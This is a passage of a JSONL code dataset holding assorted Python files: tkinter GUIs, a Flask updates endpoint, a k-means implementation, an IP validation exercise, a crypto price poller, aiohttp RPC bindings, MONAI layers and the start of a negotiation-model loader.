mimetype=text_type('image/jpeg'))\n\n 
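# the unicode mimetype above must still come back as byte-string headers (asserted below)\n        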
response = blobData(blob, self.request)\n\n headers = response.headers\n for hdr in headers:\n if hdr.lower() != 'content-length':\n self.assertTrue(isinstance(headers[hdr], binary_type))\n","sub_path":"ptahcms/tests/test_blobstorage.py","file_name":"test_blobstorage.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333669635","text":"import tkinter\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\n\r\nclass Person :\r\n def __init__(self, name):\r\n self.name = name\r\n\r\ndef MakeItJohn() :\r\n First = Person('John')\r\n messagebox.showinfo('This is current owner name', First.name)\r\n\r\ndef MakeItMatt() :\r\n First = Person('Matt')\r\n messagebox.showinfo('This is current owner name', First.name)\r\n\r\nroot = Tk()\r\n\r\nMattButton = tkinter.Button(root, text = 'Give ownership to Matt', command = MakeItMatt)\r\nJohnButton = tkinter.Button(root, text = 'Give ownership to John', command = MakeItJohn)\r\n\r\nroot.geometry(\"300x200\")\r\nMattButton.pack()\r\nJohnButton.pack()\r\nroot.mainloop()","sub_path":"ButtonTutorial.py","file_name":"ButtonTutorial.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26223172","text":"from flask import Response, Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom kraken import auth\nfrom arkos import storage, updates\nfrom kraken.messages import Message, push_record\nfrom kraken.utilities import as_job, job_response\n\nbackend = Blueprint(\"updates\", __name__)\n\n\nclass UpdatesAPI(MethodView):\n @auth.required()\n def get(self, id):\n ups = []\n data = storage.updates.get(\"updates\")\n if request.args.get(\"rescan\", None) or not data:\n data = updates.check_updates()\n for x in data:\n if id == data[\"id\"]:\n return jsonify(update={\"id\": data[\"id\"], \"info\": data[\"info\"]})\n ups.append({\"id\": data[\"id\"], \"info\": data[\"info\"]})\n return jsonify(updates=ups)\n \n @auth.required()\n def post(self):\n id = as_job(_post)\n return job_response(id)\n \n def _post(self):\n updates.install_updates(Message())\n push_record(\"updates\", updates.check_updates())\n\n\nupdates_view = UpdatesAPI.as_view('updates_api')\nbackend.add_url_rule('/updates', defaults={'id': None}, \n view_func=updates_view, methods=['GET',])\nbackend.add_url_rule('/updates', view_func=updates_view, methods=['POST',])\nbackend.add_url_rule('/updates/', view_func=updates_view, methods=['GET',])\n","sub_path":"kraken/frameworks/updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"253565995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 11:49:34 2017\n\n@author: richa\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial import distance\n\nclass K_means():\n '''\n \n '''\n def __init__(self, n_clusters = 2, max_iter = 50, \n tol= 1e-4, random_state = 0):\n self._max_iter = max_iter\n self._tol = tol\n self._n_clusters = n_clusters\n self._seed = random_state\n self._labels = None\n self._centroids = None\n \n def _get_centroids_from_data(self, data):\n # to select k centroids from data\n np.random.seed(self._seed)\n selected_rows = np.random.randint(0, \n self._get_num_observations(data), \n size = self._n_clusters)\n self._centroids = np.array(data)[selected_rows, :]\n \n def _get_num_observations(self, 
data):\n return (np.array(data)).shape[0]\n\n def _get_num_features(self, data):\n # return the number of features based on input data.\n data = np.array(data)\n return data.shape[1]\n\n def _get_labels(self, data):\n # to obtain the labels in the dataset based on the input centroids\n self._labels = distance.cdist(data, self._centroids).argmin(axis = 1)\n\n def _get_centroids(self, data):\n labels = self._labels\n list_centroids = [np.average(data[labels == j, ], axis =0) \n for j in range(self._n_clusters)]\n self._centroids = np.vstack(list_centroids)\n\n def _should_stop(self, old_centroids, iters):\n if iters > self._max_iter:\n return True\n else:\n if old_centroids is None:\n return False\n else:\n return (np.abs(old_centroids - self._centroids).sum() < self._tol)\n \n def fit(self, data):\n # initiating centroids, iteration, old_centroids \n iters = 0\n old_centroids = self._centroids\n self._get_centroids_from_data(data)\n \n # running the k means\n while not self._should_stop(old_centroids, iters):\n # assigning\n old_centroids = self._centroids\n iters += 1\n \n # calculating the labels and centroids\n self._get_labels(data)\n self._get_centroids(data)\n ","sub_path":"K_means.py","file_name":"K_means.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"18945007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nЗадание 6.2b\n\nСделать копию скрипта задания 6.2a.\n\nДополнить скрипт: Если адрес был введен неправильно, запросить адрес снова.\n\nОграничение: Все задания надо выполнять используя только пройденные темы.\n\"\"\"\n#Попытка раз. работает но выглядит оч криво\n'''\nip=input('ip adress: ')\nip_oct=ip.split('.')\nbig=False\nip_correct=False\n#проверка ввода\n\nwhile not ip_correct:\n ip_oct=ip.split('.')\n if len(ip_oct) == 4 and (''.join(ip_oct)).isdigit(): #4 октета и цифры\n i=-1\n while i=0: #непустой октет и не минусовое значение\n big=True\n ip_correct=True\n else:\n big=False\n break\n #последняя проверка и ответы\n if big:\n if ip == '0.0.0.0':\n print('unassigned')\n elif ip == '255.255.255.255':\n print('local broadcast')\n elif int(ip_oct[0]) <= 223:\n print('unicast')\n elif int(ip_oct[0]) <= 239 and int(ip_oct[0]) >= 224:\n print('multicast')\n else:\n print('unused')\n else:\n print('Неправильный IP-адрес')\n ip=input('ip adress: ')\n#это не глупо если это работает 2\n#но под конец запутался уже\n'''\n# попытка 2\n\nwhile True:\n ip = input('ip: ')\n ip_oct=ip.split('.')\n correct_ip=True\n if not len(ip_oct) == 4:\n correct_ip=False\n else:\n for num in ip_oct:\n if not (num.isdigit() and 0 <= int(num) <= 255 and correct_ip):\n correct_ip=False\n break\n if correct_ip: \n if ip == '0.0.0.0':\n print('unassigned')\n break\n elif ip == '255.255.255.255':\n print('local broadcast')\n break\n elif int(ip_oct[0]) <= 223:\n print('unicast')\n break\n elif 239 >= int(ip_oct[0]) >= 224:\n print('multicast')\n break\n else:\n print('unused')\n break\n else:\n print('Неправильный IP-адрес')","sub_path":"exercises/06_control_structures/task_6_2b.py","file_name":"task_6_2b.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"548807307","text":"#!/usr/bin/env python3\n\n# standard\nimport time\nimport json\nfrom decimal import Decimal\nfrom urllib.request import Request, urlopen\n\n# custom\nfrom libraries.logger import logger\nfrom libraries.messenger import smsalert\n\ndef poller( 
reservationprice: float ) -> None:\n # define request\n request = Request('https://api.ddex.io/v4/markets/ETH-USDC/orderbook?level=1', headers={'User-Agent': 'Mozilla/5.0'})\n\n # get content and its encoding\n content = urlopen(request).read()\n encoding = urlopen(request).info().get_content_charset('utf-8')\n while True:\n # process content\n dictionary = json.loads(content.decode(encoding))\n bidprice = dictionary[\"data\"][\"orderbook\"][\"bids\"][0][\"price\"]\n if Decimal(bidprice) < reservationprice:\n time.sleep(5) # DDEX limits API requests to 30 per minute per IP\n else:\n smsalert(f'the last bid [{bidprice} USDC] for ETH exceeded {reservationprice} USDC') # send alert to mobile phone\n break # exit loop\n\nif __name__ == \"__main__\":\n # set price alert\n reservationprice = 398.95\n # GOING LONG?\n # Then sell when buyers are meeting/exceeding this reservation price.\n try:\n # poll DDEX servers\n poller( reservationprice )\n except KeyboardInterrupt:\n logger.debug( f'exception: keyboard interuption.' )\n except Exception as e:\n logger.debug( f'exception: {e}.' )\n logger.debug( f'exiting...' )\n exit(0)\n # Loop runtime on MacBook Pro:\n # real\t0m3.205s\n # user\t0m0.393s\n # sys\t0m0.105s\n","sub_path":"poller/bid-reservation-price-level-alert.py","file_name":"bid-reservation-price-level-alert.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"397553531","text":"from sys import argv\n\n\ndef main():\n with open(argv[1]) as opencv_output:\n text = opencv_output.read()\n lines = text.split('\\n')\n output = \"\"\n for line in lines:\n tokens = line.split(\" \")\n if line[0:22] == 'pairwise_matches index':\n src_img_idx = int(tokens[4].split(\":\")[1])\n dst_img_idx = int(tokens[7].split(\":\")[1])\n if not (src_img_idx == -1) and not (dst_img_idx == -1):\n output = output + \"# {0} {1}\\n\".format(src_img_idx, dst_img_idx)\n elif line[0:7] == 'matches':\n query_x = float(tokens[9])\n query_y = float(tokens[10])\n train_x = float(tokens[17])\n train_y = float(tokens[18])\n distance = float(tokens[20])\n output = output + \"{0} {1} {2} {3} {4}\\n\".format(query_x, query_y, train_x, train_y, distance)\n with open(\"parsed_output.txt\", \"w\") as text_file:\n text_file.write(output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"non_hugin_based_stitching/helpers/parse_opencv_output.py","file_name":"parse_opencv_output.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374427036","text":"import tkinter as tk\r\nfrom available_time_finder import Available_time_finder\r\nimport threading\r\nimport datetime\r\n\r\nclass GUI:\r\n def __init__(self, url):\r\n self.stop_event = threading.Event()\r\n self.url = url\r\n self.interval = \"3 seconds\"\r\n self.number_results = 10\r\n self.finder = Available_time_finder(self.url, \"Lund\", self.number_results)\r\n self.create_gui()\r\n\r\n def create_gui(self):\r\n self.root = tk.Tk()\r\n self.root.title(\"Available times finder\")\r\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.on_close)\r\n\r\n self.start_frame = tk.Frame(self.root)\r\n self.results_opt_frame = tk.Frame(self.root)\r\n self.buttons_frame = tk.Frame(self.root)\r\n self.status_frame = tk.Frame(self.root)\r\n self.list_frame = tk.Frame(self.root)\r\n\r\n pady = 10\r\n self.start_frame.pack(padx=3, pady=pady)\r\n self.results_opt_frame.pack(pady=pady)\r\n 
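# the remaining frames pack below the option rows in declaration order\r\n        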
self.buttons_frame.pack(pady=pady)\r\n self.status_frame.pack(pady=pady)\r\n self.list_frame.pack(pady=pady)\r\n\r\n tk.Label(self.start_frame, text=\"Select Area:\").pack(side=\"left\")\r\n def set_area(value):\r\n self.finder.area = value\r\n areas = [\"Malmö\", \"Lund\", \"Kristianstad\"]\r\n self.area_option = tk.StringVar()\r\n self.area_option.set(self.finder.area)\r\n self.area_options = tk.OptionMenu(self.start_frame, self.area_option, *areas, command=set_area)\r\n self.area_options.config(compound=tk.CENTER)\r\n self.area_options.pack(side=\"left\")\r\n\r\n tk.Label(self.start_frame, text=\"Select refresh interval:\").pack(side=\"left\")\r\n def set_interval(value):\r\n self.interval = value\r\n intervals = [\"3 seconds\", \"10 seconds\", \"30 seconds\", \"1 minute\"]\r\n self.interval_option = tk.StringVar()\r\n self.interval_option.set(self.interval)\r\n self.interval_options = tk.OptionMenu(self.start_frame, self.interval_option, *intervals, command=set_interval)\r\n self.interval_options.config(compound=tk.CENTER)\r\n self.interval_options.pack(side=\"left\")\r\n\r\n padx = 5\r\n box_width = 12\r\n tk.Label(self.results_opt_frame, text=\"Number of results:\").pack(side=\"left\", padx=padx)\r\n self.nbr_res_entry = tk.Entry(self.results_opt_frame, width=box_width)\r\n self.nbr_res_entry.insert(0, 10)\r\n self.nbr_res_entry.pack(side=\"left\", padx=padx)\r\n\r\n padx = 20\r\n width = 10\r\n self.start_button = tk.Button(self.buttons_frame, text=\"Start\", width=width, command=self.on_start)\r\n self.start_button.pack(side=\"left\", padx=padx)\r\n self.stop_button = tk.Button(self.buttons_frame, text=\"Stop\", width=width, command=self.on_stop)\r\n self.stop_button.pack(side=\"left\", padx=padx)\r\n self.stop_button[\"state\"] = \"disabled\"\r\n\r\n padx = 5\r\n width = 10\r\n tk.Label(self.status_frame, text=\"Status:\").pack(side=\"left\")\r\n self.status_label = tk.Label(self.status_frame, text=\"disconnected\", width=width, bg=\"red\")\r\n self.status_label.pack(side=\"left\", padx=padx)\r\n\r\n tk.Label(self.status_frame, text=\"Next refresh in:\").pack(side=\"left\", padx=padx)\r\n self.timer_label = tk.Label(self.status_frame)\r\n self.timer_label.pack(side=\"left\")\r\n\r\n wlist = 50\r\n hlist = 15\r\n scrollbar = tk.Scrollbar(self.list_frame)\r\n scrollbar.pack(side='right', fill=tk.Y)\r\n self.times_list = tk.Listbox(self.list_frame, width=wlist, height=hlist)\r\n self.times_list.pack()\r\n self.times_list.config(yscrollcommand=scrollbar.set)\r\n scrollbar.config(command=self.times_list.yview)\r\n\r\n self.root.mainloop()\r\n\r\n def on_start(self):\r\n if self.stop_event.is_set():\r\n self.stop_event.clear()\r\n self.start_button[\"state\"] = \"disabled\"\r\n self.stop_button[\"state\"] = \"normal\"\r\n try:\r\n self.finder.number_results = int(self.nbr_res_entry.get())\r\n except:\r\n self.nbr_res_entry.delete(0, \"end\")\r\n self.nbr_res_entry.insert(0, 10)\r\n self.finder.number_results = 10\r\n self.finder.connect()\r\n self.status_label.config(text=\"Connected\", bg=\"green\")\r\n self.get_results()\r\n\r\n def get_results(self):\r\n if not self.stop_event.is_set():\r\n interval = self.interval_to_sec()\r\n times = self.finder.get_results()\r\n self.times_list.delete(0,'end')\r\n for time in times:\r\n self.times_list.insert(tk.END, time)\r\n t = threading.Timer(interval, self.get_results)\r\n t.daemon = True\r\n t.start()\r\n self.count_down(interval)\r\n\r\n def count_down(self, seconds):\r\n if self.stop_event.is_set():\r\n return\r\n if seconds > 0:\r\n 
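# still counting: show the remaining seconds, then re-arm a one-second daemon timer\r\n            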
self.timer_label['text'] = seconds\r\n t = threading.Timer(1, self.count_down, [seconds-1])\r\n t.daemon = True\r\n t.start()\r\n else:\r\n self.timer_label['text'] = seconds\r\n\r\n def interval_to_sec(self):\r\n choice, unit = self.interval.split(\" \")\r\n if unit == \"minute\" or unit == \"minutes\":\r\n return int(choice)*60\r\n else:\r\n return int(choice)\r\n\r\n def on_stop(self):\r\n self.stop_event.set()\r\n self.start_button[\"state\"] = \"normal\"\r\n self.stop_button[\"state\"] = \"disabled\"\r\n self.status_label.config(text=\"Disconnected\", bg=\"red\")\r\n\r\n def on_close(self):\r\n self.on_stop()\r\n try:\r\n self.finder.close_driver()\r\n except:\r\n pass\r\n self.root.destroy()\r\n\r\nif __name__ == '__main__':\r\n url = \"https://ventus.enalog.se/Booking/Booking/Index/skane\"\r\n GUI(url)","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"85563385","text":"import asyncio\n\nimport aiohttp\nfrom aiohttp.web_request import BaseRequest\nfrom typing import Type\n\nfrom venom.common import FieldMask\nfrom venom.exceptions import Error, ErrorResponse\nfrom venom.protocol import JSONProtocol, Protocol, URIStringProtocol, URIStringDictMessageTranscoder\nfrom venom.rpc import RequestContext\nfrom venom.rpc.comms import AbstractClient\nfrom venom.rpc.method import Method, HTTPVerb, HTTPFieldLocation\n\ntry:\n from aiohttp import web, ClientSession\nexcept ImportError:\n raise RuntimeError(\"You must install the 'aiohttp' package to use the AioHTTP features of Venom RPC\")\n\n\nclass AioHTTPRequestContext(RequestContext):\n request: BaseRequest\n\n def __init__(self, request: BaseRequest):\n self.request = request\n\n\ndef _route_handler(venom: 'venom.rpc.Venom', method: Method, protocol_factory: Type[Protocol]):\n rpc_response = protocol_factory(method.response)\n rpc_error_response = protocol_factory(ErrorResponse)\n\n http_status = method.http_status\n\n http_field_locations = method.http_field_locations()\n\n http_request_body = JSONProtocol(method.request, FieldMask(http_field_locations[HTTPFieldLocation.BODY]))\n\n http_request_query = URIStringDictMessageTranscoder(URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.QUERY]))\n\n http_request_path = URIStringDictMessageTranscoder(URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.PATH]))\n\n async def handler(http_request):\n try:\n request = http_request_body.unpack(await http_request.read())\n http_request_query.decode(http_request.url.query, request)\n http_request_path.decode(http_request.match_info, request)\n\n response = await venom.invoke(method, request, context=AioHTTPRequestContext(http_request))\n return web.Response(body=rpc_response.pack(response),\n content_type=rpc_response.mime,\n status=http_status)\n except Error as e:\n return web.Response(body=rpc_error_response.pack(e.format()),\n content_type=rpc_error_response.mime,\n status=e.http_status)\n\n return handler\n\n\ndef _path_field_template(field, default):\n if not field.repeated and field.type == int:\n return f'{field.json_name}:\\d+'\n return default\n\n\ndef create_app(venom: 'venom.rpc.Venom',\n app: web.Application = None,\n protocol_factory: Type[Protocol] = JSONProtocol):\n if app is None:\n app = web.Application()\n\n for method in venom.iter_methods():\n app.router.add_route(method.http_method.value,\n 
method.format_http_path(json_names=True, field_template_hook=_path_field_template),\n _route_handler(venom, method, protocol_factory))\n\n return app\n\n\nclass HTTPClient(AbstractClient):\n def __init__(self,\n stub: Type['venom.rpc.Service'],\n base_url: str,\n *,\n protocol_factory: Type[Protocol] = None,\n session: aiohttp.ClientSession = None,\n **session_kwargs):\n super().__init__(stub, protocol_factory=protocol_factory)\n self._base_url = base_url\n\n if session is None:\n self._session = aiohttp.ClientSession(**session_kwargs)\n else:\n self._session = session\n\n async def invoke(self,\n method: Method,\n request: 'venom.message.Message',\n *,\n context: 'venom.RequestContext' = None,\n loop: 'asyncio.AbstractEventLoop' = None,\n timeout: int = None):\n\n # TODO optional timeouts\n\n if method.http_path_parameters():\n url = self._base_url + method.http_path.format(**request)\n else:\n url = self._base_url + method.http_path\n\n headers = None\n if method.http_method in (HTTPVerb.POST, HTTPVerb.PUT, HTTPVerb.PATCH):\n headers = {'content-type': self._protocol_factory.mime}\n\n http_field_locations = method.http_field_locations()\n\n params = URIStringDictMessageTranscoder(\n URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.QUERY])).encode(request)\n\n body = self._protocol_factory(method.request,\n http_field_locations[HTTPFieldLocation.BODY]).pack(request)\n\n async with self._session.request(method.http_method.value.lower(), url,\n headers=headers,\n data=body,\n params=params) as response:\n if 200 <= response.status < 400:\n return self._protocol_factory(method.response).unpack(await response.read())\n else:\n self._protocol_factory(ErrorResponse).unpack(await response.read()).raise_()\n\n # XXX not sure if session should be opened for each request, and why an unclosed session is such a bad thing.\n def __del__(self):\n if self._session:\n self._session.close()\n\n\nClient = HTTPClient\n","sub_path":"venom/rpc/comms/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561596541","text":"#coding=utf-8\nfrom utils.response_code import RET\nfrom utils.commons import required_login\nfrom utils.qiniu_storage import storage\nfrom .BaseHandler import BaseHandler\n\nimport constants\nimport logging\n\nclass AvatarHandler(BaseHandler):\n\t#/api/profile/avatar\n\t@required_login\n\tdef post(self):\n\t\tfiles = self.request.files.get(\"avatar\") ####\n\t\t#logging.debug(self.request.files) #{u'file': [{'body':'','content_type': u'image/png', 'filename': u'qq.png'}]}\n\t\tif not files:\n\t\t\treturn self.write(dict(errcode=RET.PARAMERR, errmsg=\"未传图片\"))\n\t\tavatar = files[0][\"body\"]\n\t\t#logging.debug(\"AvatarHandler type(files):%s\" %(type(files))) #\n\t\ttry:\n\t\t\tfile_name = storage(avatar)\n\t\t\tlogging.debug(file_name) #avatar\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.THIRDERR, errmsg=\"上传失败\"))\n\n\t\tuser_id = self.session.data[\"user_id\"] #\n\t\tlogging.debug(user_id)\n\t\tsql = \"update ih_user_profile set up_avatar=%(avatar)s where up_user_id=%(user_id)s;\"\n\t\ttry:\n\t\t\trow_count = self.db.execute_rowcount(sql, avatar=file_name, user_id=user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.DBERR, 
errmsg=\"保存错误\"))\n\t\t#data:\"http://oxy4g2gly.bkt.clouddn.com/FmyaPesgUtGf5K5lZaXUtBLd046f\"\n\t\tself.write(dict(errcode=RET.OK, errmsg=\"保存成功\", data=\"%s%s\" % (constants.QINIU_URL_PREFIX, file_name)))\n\n\nclass ProfileHandler(BaseHandler):\n\t#/api/profile\n\t@required_login\n\tdef get(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\ttry:\n\t\t\tret = self.db.get(\"select up_name, up_mobile, up_avatar from ih_user_profile where up_user_id=%s\", user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.PARAMERR, errmsg=\"\"))\n\t\tif ret[\"up_avatar\"]:\n\t\t\timg_url = constants.QINIU_URL_PREFIX + ret[\"up_avatar\"]\n\t\telse:\n\t\t\timg_url = None\n\t\treturn self.write({\"errcode\":RET.OK, \"errmsg\":\"OK\", \"data\":{\"user_id\":user_id, \"name\":ret[\"up_name\"], \"mobile\":ret[\"up_mobile\"], \"avatar\":img_url}})\n\n\nclass AuthHandler(BaseHandler):\n\t\"\"\"实名认证\"\"\"\n\t#/api/profile/auth\n\t@required_login\n\tdef get(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\n\t\ttry:\n\t\t\tret = self.db.get(\"select up_real_name,up_id_card from ih_user_profile where up_user_id=%s;\", user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"get data failed\"})\n\t\tlogging.debug(ret) #{'up_id_card': None, 'up_real_name': None}\n\t\tif not ret:\n\t\t\treturn self.write({\"errcode\":RET.NODATA, \"errmsg\":\"no data\"})\n\t\tself.write({\"errcode\":RET.OK, \"errmsg\":\"OK\", \"data\":{\"real_name\":ret.get(\"up_real_name\", \"\"), \"id_card\":ret.get(\"up_id_card\", \"\")}})\n\n\t'''\n\t/api/profile/auth\n\t{\n\t\t\"real_name\": \"Alex\",\n\t\t\"id_card\": \"320xxxxxxx\"\n\t}\n\t'''\n\t@required_login\n\tdef post(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\treal_name = self.json_args.get(\"real_name\")\n\t\tid_card = self.json_args.get(\"id_card\")\n\t\tif real_name in (None, \"\") or id_card in (None, \"\"):\n\t\t\treturn self.write({\"errcode\":RET.PARAMERR, \"errmsg\":\"params error\"})\n\t\t# 判断身份证号格式\n\t\ttry:\n\t\t\tself.db.execute_rowcount(\"update ih_user_profile set up_real_name=%s, up_id_card=%s where up_user_id=%s\", real_name, id_card, user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"update failed\"})\n\t\tself.write({\"errcode\":RET.OK, \"errmsg\":\"OK\"})\n\n\nclass NameHandler(BaseHandler):\n\t\"\"\"设置用户名\"\"\"\n\t#/api/profile/name\n\t@required_login\n\tdef post(self):\n\t\t# 从session中获取用户身份,user_id\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\tname = self.json_args.get(\"name\")\n\n\t\t# 判断name是否传了,并且不应为空字符串\n\t\t# if name == None or \"\" == name:\n\t\tif name in (None, \"\"):\n\t\t\treturn self.write({\"errcode\":RET.PARAMERR, \"errmsg\":\"params error\"})\n\n\t\t# 保存用户昵称name,并同时判断name是否重复(利用数据库的唯一索引)\n\t\ttry:\n\t\t\tself.db.execute_rowcount(\"update ih_user_profile set up_name=%s where up_user_id=%s\", name, user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"name has exist\"})\n\n\t\t# 修改session数据中的name字段,并保存到redis中 \n\t\t#care here\n\t\tself.session.data[\"name\"] = name\n\t\ttry:\n\t\t\tself.session.save()\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\tself.write({\"errcode\":RET.OK, 
\"errmsg\":\"OK\"})\n","sub_path":"tornado/xHome/handlers/Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21460694","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom monai.networks.layers.convutils import gaussian_1d, same_padding\nfrom monai.utils.misc import ensure_tuple_rep\n\n__all__ = [\"SkipConnection\", \"Flatten\", \"GaussianFilter\"]\n\n\nclass SkipConnection(nn.Module):\n \"\"\"Concats the forward pass input with the result from the given submodule.\"\"\"\n\n def __init__(self, submodule, cat_dim=1):\n super().__init__()\n self.submodule = submodule\n self.cat_dim = cat_dim\n\n def forward(self, x):\n return torch.cat([x, self.submodule(x)], self.cat_dim)\n\n\nclass Flatten(nn.Module):\n \"\"\"Flattens the given input in the forward pass to be [B,-1] in shape.\"\"\"\n\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\nclass Reshape(nn.Module):\n \"\"\"\n Reshapes input tensors to the given shape (minus batch dimension), retaining original batch size.\n \"\"\"\n\n def __init__(self, *shape):\n \"\"\"\n Given a shape list/tuple `shape` of integers (s0, s1, ... , sn), this layer will reshape input tensors of\n shape (batch, s0 * s1 * ... * sn) to shape (batch, s0, s1, ... 
, sn).\n\n Args:\n shape: list/tuple of integer shape dimensions \n \"\"\"\n super().__init__()\n self.shape = (1,) + tuple(shape)\n\n def forward(self, x):\n shape = list(self.shape)\n shape[0] = x.shape[0] # done this way for Torchscript\n return x.reshape(shape)\n\n\nclass GaussianFilter(nn.Module):\n def __init__(self, spatial_dims: int, sigma, truncated: float = 4.0):\n \"\"\"\n Args:\n spatial_dims: number of spatial dimensions of the input image.\n must have shape (Batch, channels, H[, W, ...]).\n sigma (float or sequence of floats): std.\n truncated: spreads how many stds.\n \"\"\"\n super().__init__()\n self.spatial_dims = int(spatial_dims)\n _sigma = ensure_tuple_rep(sigma, self.spatial_dims)\n self.kernel = [\n torch.nn.Parameter(torch.as_tensor(gaussian_1d(s, truncated), dtype=torch.float), False) for s in _sigma\n ]\n self.padding = [same_padding(k.size()[0]) for k in self.kernel]\n self.conv_n = [F.conv1d, F.conv2d, F.conv3d][spatial_dims - 1]\n for idx, param in enumerate(self.kernel):\n self.register_parameter(f\"kernel_{idx}\", param)\n\n def forward(self, x: torch.Tensor):\n \"\"\"\n Args:\n x (tensor): in shape [Batch, chns, H, W, D].\n \"\"\"\n if not torch.is_tensor(x):\n raise TypeError(f\"x must be a Tensor, got {type(x).__name__}.\")\n chns = x.shape[1]\n sp_dim = self.spatial_dims\n x = x.clone() # no inplace change of x\n\n def _conv(input_, d):\n if d < 0:\n return input_\n s = [1] * (sp_dim + 2)\n s[d + 2] = -1\n kernel = self.kernel[d].reshape(s)\n kernel = kernel.repeat([chns, 1] + [1] * sp_dim)\n padding = [0] * sp_dim\n padding[d] = self.padding[d]\n return self.conv_n(input=_conv(input_, d - 1), weight=kernel, padding=padding, groups=chns)\n\n return _conv(x, sp_dim - 1)\n","sub_path":"monai/networks/layers/simplelayers.py","file_name":"simplelayers.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"471721821","text":"from systems.neural_system import PytorchNeuralSystem\nfrom neural import model_builder\nfrom cocoa.core.schema import Schema\nfrom cocoa.core.scenario_db import ScenarioDB\nfrom core.scenario import Scenario\nfrom pathlib2 import Path\nimport pickle\nimport torch\nimport json\n\n\nFILE_PATH = Path(__file__).absolute().parent\n\nclass Loader:\n \"\"\"Load the pre-trained policy pickle files from Codalabs. 
Assumes\n the file directory structure in the Dockerfile.\n\n \"\"\"\n\n SCHEMA_PATH = str(FILE_PATH/\"data\"/\"craigslist-schema.json\")\n MODEL_PATH = str(FILE_PATH/\"checkpoint\"/\"lf2lf\"/\"model_best.pt\")\n PRICE_TRACKER_PATH = str(FILE_PATH/\"price_tracker.pkl\")\n DATA_PATH = str(FILE_PATH/\"data\"/\"dev.json\")\n\n def __init__(self, use_gpu=False):\n # make args that are supposed to be passed in by command line arguments\n args = {\n \"model\": \"lf2lf\",\n \"word_vec_size\": 300,\n \"dropout\": 0.,\n \"encoder_type\": \"rnn\",\n \"decoder_type\": \"rnn\",\n \"context_embedder_type\": \"mean\",\n \"global_attention\": \"multibank_general\",\n \"share_embeddings\": False,\n \"share_decoder_embeddings\": False,\n \"enc_layers\": 1,\n \"copy_attn\": False,\n \"dec_layers\": 1,\n \"pretrained_wordvec\": \"\",\n \"rnn_size\": 300,\n \"rnn_type\": \"LSTM\",\n \"enc_layers\": 1,\n \"num_context\": 2,\n \"stateful\": True,\n \"sample\": True,\n \"max_length\": 10,\n \"n_best\": 1,\n \"batch_size\": 128,\n \"optim\": \"adagrad\",\n \"alpha\": 0.01,\n \"temperature\": 0.5,\n \"epochs\": 30,\n \"report_every\": 500,\n }\n if use_gpu:\n args.gpuid = 0\n\n # HACK: convert args from dict into object. Ex. args[\"epochs\"]\n # becomes args.epochs\n args = type(\"args\", (), args)\n\n # load price tracker\n with open(self.PRICE_TRACKER_PATH) as f:\n price_tracker = pickle.load(f)\n\n # load schema\n schema = Schema(self.SCHEMA_PATH)\n\n # load system\n self.system = 